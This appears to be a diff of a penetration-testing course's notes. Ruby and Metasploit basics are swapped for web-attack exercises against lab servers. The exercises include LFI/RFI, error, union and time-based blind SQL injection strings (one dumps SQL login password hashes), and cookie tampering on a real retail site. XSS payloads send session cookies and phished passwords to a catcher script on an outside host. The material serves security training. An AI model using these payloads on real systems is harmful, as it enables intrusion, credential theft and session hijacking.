860		https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
861	-	- An argument is a value or variable that is passed to the function while calling it. In the following example, while
861	+
862	-	calling the puts() function, we are sending a string value to the function. This string value is used by the
862	+
863	-	function to perform some particular operations.
863	+
864
865	-	puts ("Pentesting")
865	+
866
867		#########################
868	-	- There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
868	+	# File Handling Attacks #
869	-	explain some useful string functions with an example.
869	+	#########################
870
871	-	- The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
871	+	Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
872	-	reverse function reverses a string. The following example demonstrates how to use the string functions.
872	+
873		---------------------------Type This-----------------------------------
874
875	-	55.class
875	+	http://45.63.104.73/showfile.php?filename=about.txt
876	-	"I Love Programming".class
876	+
877	-	"I Love Pentesting".length
877	+
878	-	"Pown that box".upcase
878	+
879	-	"Love" + "To Root Boxes"
879	+
880	-	"evil".reverse
880	+	See if you can read files on the file system:
881	-	"evil".reverse.upcase
881	+
882
883		http://45.63.104.73/showfile.php?filename=/etc/passwd
884		-----------------------------------------------------------------------
885	-	- expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
885	+
886	-	an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
886	+	We call this attack a Local File Include or LFI.
887	-	examples of some expressions.
887	+
888		Now let's find some text out on the internet somewhere:
889		https://www.gnu.org/software/hello/manual/hello.txt
890	-	a = 3
890	+
891	-	b = 6
891	+
892	-	a+b+20
892	+	Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
893	-	d = 44
893	+
894	-	f = d
894	+
895	-	puts f
895	+
896		http://45.63.104.73/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
897		-----------------------------------------------------------------------
898
899		#########################################################################################
900		# SQL Injection #
901		# http://45.63.104.73/1-Intro_To_SQL_Intection.pptx #
902	-	- shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
902	+	#########################################################################################
903	-	assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
903	+
904	-	statements to understand the shortcuts.
904	+
905		- Another quick way to test for SQLI is to remove the paramter value
906
907	-	g = 70
907	+
908	-	g = g+44
908	+	#############################
909	-	g += 33
909	+	# Error-Based SQL Injection #
910		#############################
911		---------------------------Type This-----------------------------------
912
913	-	- In the above statement, g is incremented by 33 and then the total value is assigned to g.
913	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
914		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
915		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
916		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
917		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
918	-	g *= 3
918	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
919		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
920		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
921		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
922	-	- In the above statement, g is multiplied with 3 and then assigned to g.
922	+
923		-----------------------------------------------------------------------
924	-	- Example
924	+
925
926	-	- Comparison Operators, Loops, Data Types, and Constants
926	+
927		#############################
928	-	- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
928	+	# Union-Based SQL Injection #
929	-	how to use the following comparison operators.
929	+	#############################
930
931	-	'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
931	+
932	-	variable or constant. If it's less than the other, the 'less than' operator returns true.
932	+
933		http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
934	-	'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
934	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
935	-	or constant. If it's equal to the other, the 'equal to' operator returns true.
935	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
936		http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
937	-	'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
937	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
938	-	variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
938	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
939		http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
940		http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
941	-	numberofports = 55
941	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
942	-	puts "number of ports found during scan" if numberofports < 300
942	+	http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
943	-	numberofports = 400
943	+
944	-	puts "number of ports found during scan" if numberofports < 300
944	+
945	-	puts "number of ports found during scan" if numberofports == 300
945	+	We are using a union select statement because we are joining the developer's query with one of our own.
946	-	puts "number of ports found during scan" if numberofports != 300
946	+	Reference:
947		http://www.techonthenet.com/sql/union.php
948		The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
949		It removes duplicate rows between the various SELECT statements.
950
951	-	Example
951	+	Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
952
953		---------------------------Type This-----------------------------------
954	-	- the 'OR' operator and the 'unless' keyword. This symbol '\|\|' represents the logical 'OR' operator.
954	+
955		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
956	-	- This operator is generally used to combine multiple conditions.
956	+
957	-	- In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
957	+
958		Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
959	-	- following example to understand how this operator works.
959	+
960		---------------------------Type This-----------------------------------
961
962	-	ports = 100
962	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
963	-	puts "number of ports found on the network" if ports<100 \|\| ports>200
963	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
964	-	puts "number of ports found on the network" if ports<100 \|\| ports>75
964	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
965		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
966
967	-	# unless
967	+
968
969
970	-	portsbelow1024 = 50
970	+
971	-	puts "If the ports are below 1024" unless portsbelow1024 < 1000
971	+
972	-	puts "If the ports are below 1024" unless portsbelow1024 < 1055
972	+	- Another way is to see if you can get the backend to perform an arithmetic function
973	-	puts "If the ports are below 1024" unless portsbelow1024 < 20
973	+
974		---------------------------Type This-----------------------------------
975
976	-	- The 'unless' keyword is used to do something programmatically unless a condition is true.
976	+	http://45.77.162.239/bookdetail.aspx?id=(2)
977		http://45.77.162.239/bookdetail.aspx?id=(4-2)
978		http://45.77.162.239/bookdetail.aspx?id=(4-1)
979
980	-	- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
980	+
981
982	-	- See the following example to understand how a string is printed 10 times on the screen using a loop.
982	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
983		http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
984		http://45.77.162.239/bookdetail.aspx?id=1*1
985	-	10.times do puts "infosecaddicts" end
985	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
986		http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
987		http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
988	-	# Or use the curly braces
988	+	http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
989		http://45.77.162.239/bookdetail.aspx?id=2 &0#
990
991	-	10.times {puts "infosecaddicts"}
991	+
992
993		http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
994		http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
995	-	- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
995	+	http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
996	-	working with different data types. Data type conversion is also known as type casting.
996	+	http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
997
998		-----------------------------------------------------------------------
999
1000	-	- Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
1000	+
1001	-	change the value of a constant, you will see a warning message.
1001	+
1002		# Blind SQL Injection Testing #
1003		###############################
1004		Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
1005
1006	-	- Multiple Line String Variable, Interpolation, and Regular Expressions
1006	+	3 - Total Characters
1007		---------------------------Type This-----------------------------------
1008	-	- A multiple line string variable lets you assign the value to the string variable through multiple lines.
1008	+
1009		http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
1010		http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
1011	-	infosecaddicts = <<mark
1011	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
1012	-	welcome
1012	+
1013	-	to the
1013	+
1014	-	best
1014	+	Let's go for a quick check to see if it's DBO
1015	-	metasploit
1015	+
1016	-	course
1016	+
1017	-	on the
1017	+
1018	-	market
1018	+	http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
1019	-	mark
1019	+
1020	-	puts infosecaddicts
1020	+
1021		Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
1022
1023		---------------------------Type This-----------------------------------
1024	-	- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
1024	+
1025	-	it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
1025	+	D - 1st Character
1026	-	Examine the following example to understand how interpolation works in Ruby.
1026	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
1027		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
1028	-	References:
1028	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
1029	-	https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
1029	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
1030
1031		B - 2nd Character
1032		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1033	-	a = 4
1033	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1034	-	b = 6
1034	+
1035	-	puts "a * b = a*b"
1035	+	O - 3rd Character
1036	-	puts " #{a} * #{b} = #{a*b} "
1036	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1037	-	person = "Joe McCray"
1037	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
1038	-	puts "IT Security consultant person"
1038	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1039	-	puts "IT Security consultant #{person}"
1039	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1040		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
1041		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
1042	-	- Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
1042	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1043
1044		-----------------------------------------------------------------------
1045
1046
1047
1048	-	- Character classes
1048	+
1049
1050	-	infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
1050	+
1051	-	"I love metasploit and what it has to offer!".scan(/[lma]/) {\|y\| puts y}
1051	+
1052	-	"I love metasploit and what it has to offer!".scan(/[a-m]/) {\|y\| puts y}
1052	+
1053		# Playing with session cookies #
1054		################################
1055
1056	-	- Arrays, Push and Pop, and Hashes
1056	+
1057		Step 1: Browse to NewEgg.com
1058		-------------------------Paste this into Firefox-----------------------------------
1059	-	- In the following example, numbers is an array that holds 6 integer numbers.
1059	+	https://secure.newegg.com/
1060		----------------------------------------------------------------------------------
1061
1062
1063	-	numbers = [2,4,6,8,10,100]
1063	+	Step 2: Browse to the shopping cart page NewEgg.com
1064	-	puts numbers[0]
1064	+
1065	-	puts numbers[4]
1065	+	https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1066	-	numbers[2] = 150
1066	+	----------------------------------------------------------------------------------
1067	-	puts numbers
1067	+
1068
1069		Step 3: View the current session ID
1070		-------------------------Paste this into Firefox-----------------------------------
1071		javascript:void(document.write(document.cookie))
1072	-	- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
1072	+	------------------------------------------------------------------------------------
1073
1074		Step 4: Go back to the shopping cart page (click the back button)
1075		---------------------------------------------------------------------------------
1076	-	framework = []
1076	+	https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1077	-	framework << "modules"
1077	+	---------------------------------------------------------------------------------
1078	-	framework << "exploits"
1078	+
1079	-	framework << "payloads"
1079	+
1080	-	framework.pop
1080	+	Step 5: Now let's modify the session ID
1081	-	framework.shift
1081	+
1082		javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
1083		------------------------------------------------------------------------------------
1084	-	- Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
1084	+
1085	-	that is used to access the element.
1085	+
1086
1087		Step 6: Go back to the shopping cart page (click the back button)
1088	-	- Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
1088	+	---------------------------------------------------------------------------------
1089	-	In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
1089	+	https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1090	-	respective values: 'what module should you use', 'Windows XP' and 'SSH'.
1090	+	---------------------------------------------------------------------------------
1091
1092
1093	-	metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
1093	+
1094	-	print metasploit.size
1094	+	Step 7: View the current session ID
1095	-	print metasploit["microsoft"]
1095	+
1096	-	metasploit['microsoft'] = 'redhat'
1096	+	javascript:void(document.write(document.cookie))
1097	-	print metasploit['microsoft']
1097	+	------------------------------------------------------------------------------------
1098
1099		-----------------------------------------------------------------------
1100
1101		###########################################
1102	-	- Writing Ruby Scripts
1102	+	# What is XSS #
1103		# http://45.63.104.73/2-Intro_To_XSS.pptx #
1104		###########################################
1105	-	- Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
1105	+
1106	-	this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
1106	+
1107	-	someone made to look for a specific port. The port that it is looking for is port 21 FTP.
1107	+
1108		1. Use Firefox to browse to the following location:
1109	-	cd ~/metasploit-framework/modules/auxiliary/scanner/portscan
1109	+
1110	-	ls
1110	+
1111		http://45.63.104.73/xss_practice/
1112		-----------------------------------------------------------------------
1113
1114		A really simple search page that is vulnerable should come up.
1115	-	###########################
1115	+
1116	-	# Metasploit Fundamentals #
1116	+
1117	-	###########################
1117	+
1118
1119	-	- Let's take a little look at Metasploit Framework
1119	+
1120		---------------------------Type This-----------------------------------
1121	-	- First, we should take note of the different directories, the Modular Architecture.
1121	+
1122		<script>alert('So this is XSS')</script>
1123	-	The modules that make up the Modular Architecture are
1123	+
1124	-	Exploits
1124	+
1125	-	Auxiliary
1125	+
1126	-	Payload
1126	+	This should pop-up an alert window with your message in it proving XSS is in fact possible.
1127	-	Encoder
1127	+	Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1128	-	Nops
1128	+
1129
1130		3. In the search box type:
1131	-	Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
1131	+
1132
1133	-	are
1133	+	<script>alert(document.cookie)</script>
1134		-----------------------------------------------------------------------
1135	-	Modules
1135	+
1136	-	Scripts
1136	+
1137	-	Plugins
1137	+	This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
1138	-	External
1138	+	Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1139	-	Data
1139	+
1140	-	Tools
1140	+
1141		---------------------------Type This-----------------------------------
1142	-	- Let's take a look inside the Metasploit directory and see what's the
1142	+
1143		<script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
1144	-	cd ~/toolz/metasploit
1144	+
1145	-	ls
1145	+
1146
1147		This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
1148
1149
1150	-	- Now let's take a look inside the Modules directory and see what's there.
1150	+
1151		---------------------------Type This-----------------------------------
1152	-	cd ~/metasploit-framework/modules
1152	+
1153	-	ls
1153	+
1154		-----------------------------------------------------------------------
1155
1156	-
1156	+
1157	-	The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
1157	+
1158	-	not necessarily need to - have a shell or session started on a machine.
1158	+
1159
1160	-	The exploits directory has our modules that we need to pop a shell on a box.
1160	+
1161	-	The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
1161	+
1162	-	like Burp Suite
1162	+
1163	-	- Let's take a look at the external directory
1163	+
1164		############################
1165	-	cd ~/metasploit-framework/external
1165	+
1166	-	ls
1166	+
1167
1168
1169	-	- Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
1169	+
1170
1171	-	cd ~/metasploit-framework/data
1171	+
1172	-	ls
1172	+
1173		---------------------------Type This-----------------------------------
1174
1175	-	- For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
1175	+	http://45.63.104.73/xss_practice/
1176	-	brute-forcing
1176	+
1177
1178	-	cd ~/metasploit-framework/data/wordlists
1178	+
1179	-	ls
1179	+
1180		Paste this in the search box
1181		----------------------------
1182	-	- The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
1182	+
1183	-	once a session is created.
1183	+
1184		---------------------------Type This-----------------------------------
1185	-	cd ~/metasploit-framework/data/meterpreter
1185	+
1186	-	ls
1186	+
1187		password=prompt('Your session is expired. Please enter your password to continue',' ');
1188		document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
1189	-	- The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
1189	+
1190	-	like escalating privileges and dumping hashes.
1190	+
1191
1192	-	These are being phased out, though, and post-exploitation modules are what is being more preferred.
1192	+
1193	-	The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
1193	+
1194	-	find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
1194	+
1195	-	for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
1195	+
1196	-	custom shellcode.
1196	+	http://45.63.104.73/xss_practice/passwords.html
1197
1198	-	The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
1198	+
1199	-	to do with other programs to make things like importing and exporting reports simple.
1199	+
1200	-	Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
1200	+	###############################################################
1201	-	the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
1201	+	# Question 1: What is the process that you use when you test? #
1202	-	modules we're going to have a better understanding of where everything needs to go.
1202	+	###############################################################
1203
1204	-	cd ~/metasploit-framework/modules/exploits
1204	+	Step 1: Automated Testing
1205	-	ls
1205	+
1206		Step 1a: Web Application vulnerability scanners
1207		-----------------------------------------------
1208		- Run two (2) unauthenticated vulnerability scans against the target
1209	-	- The exploits directory is split up into several different directories, each one housing exploits for different types
1209	+	- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
1210	-	of systems. I.E. Windows, Unix, OSX, dialup and so on.
1210	+	- Run two (2) authenticated vulnerability scans against the target with admin privileges
1211	-	Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
1211	+
1212	-	into categories of different types of services/programs, so that you can pick out an exploit specifically for the
1212	+	The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
1213	-	service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
1213	+
1214	-	for us.
1214	+	A good web application vulnerability scanner comparison website is here:
1215		http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
1216	-	cd ~/metasploit-framework/modules/auxiliary/
1216	+
1217	-	ls
1217	+
1218	-	-----------------------------------------------------------------------
1218	+	Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
1219
1220		When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
1221	-	- And a little further into the directory, let's take a look at what's in the scanner directory
1221	+
1222
1223	-	cd ~/metasploit-framework/modules/auxiliary/scanner/
1223	+	Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
1224	-	ls
1224	+
1225
1226		Also, be sure to save the scan results and logs. I usually provide this data to the customer.
1227
1228	-	- And one more folder deeper into the structure, let's take a look in the portscan folder
1228	+
1229
1230	-	cd ~/metasploit-framework/modules/auxiliary/scanner/portscan
1230	+	Step 1b: Directory Brute Forcer
1231	-	ls
1231	+	-------------------------------
1232	-	-----------------------------------------------------------------------
1232	+	I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
1233
1234	-	- If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
1234	+
1235	-	and report them back to us in a nice, easily readable format.
1235	+
1236		Step 2: Manual Testing
1237	-	cat tcp.rb
1237	+
1238		Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
1239
1240		Step 2a: Spider/Scan the entire site with Burp Suite
1241	-	- Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
1241	+	Save the spider and scan results. I usually provide this data to the customer as well.
1242	-	once you have a session on a machine.
1242	+
1243	-	Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
1243	+
1244	-	succeeds.
1244	+	Step 2b: Browse through the site using the 3 question method
1245		Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
1246	-	cd ~/metasploit-framework/modules/payloads/
1246	+
1247	-	ls
1247	+	Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
1248	-	-----------------------------------------------------------------------
1248	+
1249		Here is what I mean:
1250		http://www.site.com/page.aspx?parametername=parametervalue
1251	-	- There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
1251	+
1252	-	application for it to be used as.
1252	+	When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
1253	-	Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
1253	+
1254	-	do everything once you have that shell calling back to you.
1254	+	http://www.site.com/page.aspx?parametername=[ payload ]
1255	-	Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
1255	+
1256	-	the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
1256	+	You need to ensure that you send the payload this way, and like this below:
1257	-	much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
1257	+
1258	-	to download Stages payloads.
1258	+	http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
1259
1260		This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
1261	-	- Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
1261	+
1262	-	shells.
1262	+
1263
1264	-	cd singles
1264	+
1265	-	cd windows
1265	+
1266	-	ls
1266	+
1267
1268		###########################################
1269		# Question 2: How much fuzzing is enough? #
1270	-	- We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
1270	+	###########################################
1271	-	see what it actually does.
1271	+	There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
1272
1273	-	cat adduser.rb
1273	+	Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
1274
1275
1276	-	Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
1276	+	Step 1: Ask yourself the 3 questions per page of the site.
1277	-	the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
1277	+
1278	-	it gives Windows to add the user to the system.
1278	+	Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
1279
1280		Step 3: When you load your fuzz strings - use the following decision tree
1281	-	- Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
1281	+
1282		- Are the fuzz strings causing a default error message (example 404)?
1283	-	windows/shell/bind_tcp or windows/shell/reverse_tcp
1283	+	- If this is the case then it is most likely NOT vulnerable
1284
1285	-	cd ../../stagers
1285	+	- Are the fuzz strings causing a WAF or LB custom error message?
1286	-	ls
1286	+	- If this is the case then you need to find an encoding method to bypass
1287
1288
1289		- Are the fuzz strings causing an error message that discloses the backend type?
1290		- If yes, then identify DB type and find correct syntax to successfully exploit
1291	-	- Again, we can see that we have stagers for multiple systems and code types.
1291	+	- Some example strings that I use are:
1292		'
1293	-	ls windows/
1293	+	"
1294	-	-----------------------------------------------------------------------
1294	+	() <----- Take the parameter value and put it in parenthesis
1295		(5-1) <----- See if you can perform an arithmetic function
1296
1297	-	As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
1297	+
1298	-	machine, so we can upload or download our stage payloads and execute commands.
1298	+	- Are the fuzz strings rendering executable code?
1299	-	Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
1299	+	- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
1300	-	our stagers...
1300	+	- Some example strings that I use are:
1301		<b>hello</b>
1302	-	cd ../stages
1302	+	<u>hello</u>
1303	-	ls
1303	+	<script>alert(123);</script>
1304	-	-----------------------------------------------------------------------
1304	+	<script>alert(xss);</script>
1305		<script>alert('xss');</script>
1306		<script>alert("xss");</script>
1307	-	Again, we can see that our stages are coded for particular operating systems and languages.
1307	+
1308	-	We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
1308	+
1309	-	victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
1309	+
1310	-	if any.
1310	+
1311		# Bug Bounty Programs #
1312	-	- Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
1312	+
1313	-	already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
1313	+	https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65
1314	-	so we can impersonate other users on the system in hopes of elevating our privileges.
1314	+
1315
1316	-	cd ../../../post/
1316	+
1317	-	ls
1317	+	# Bug Hunter's Methodology #
1318	-	cd windows/
1318	+
1319	-	ls
1319	+	https://www.youtube.com/watch?v=C4ZHAdI8o1w
1320	-	-----------------------------------------------------------------------
1320	+	https://www.youtube.com/watch?v=-FAjxUOKbdI
1321
1322
1323	-	Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
1323	+
1324	-	the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
1324	+
1325	-	escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
1325	+	# Log Analysis with Linux command-line tools #
1326	-	possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
1326	+
1327	-	memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
1327	+	The following command line executables are found in the Mac as well as most Linux Distributions.
1328
1329	-	#################################
1329	+	cat – prints the content of a file in the terminal window
1330	-	# Getting start with MSFConsole #
1330	+	grep – searches and filters based on patterns
1331	-	#################################
1331	+	awk – can sort each row into fields and display only what is needed
1332		sed – performs find and replace functions
1333		sort – arranges output in an order
1334	-	cd ~/metasploit-framework/
1334	+	uniq – compares adjacent lines and can report, filter or provide a count of duplicates
1335
1336	-	./msfconsole
1336	+
1337		##############
1338		# Cisco Logs #
1339		##############
1340
1341		-----------------------------Type this-----------------------------------------
1342	-	# Run any Linux command inside of MSFConsole #
1342	+	wget http://45.63.104.73/cisco.log
1343		-------------------------------------------------------------------------------
1344
1345	-	Once you are inside of MSFConsole you want to do EVERYTHING
1345	+	AWK Basics
1346	-	that you'd normally do in your Linux command shell in addition
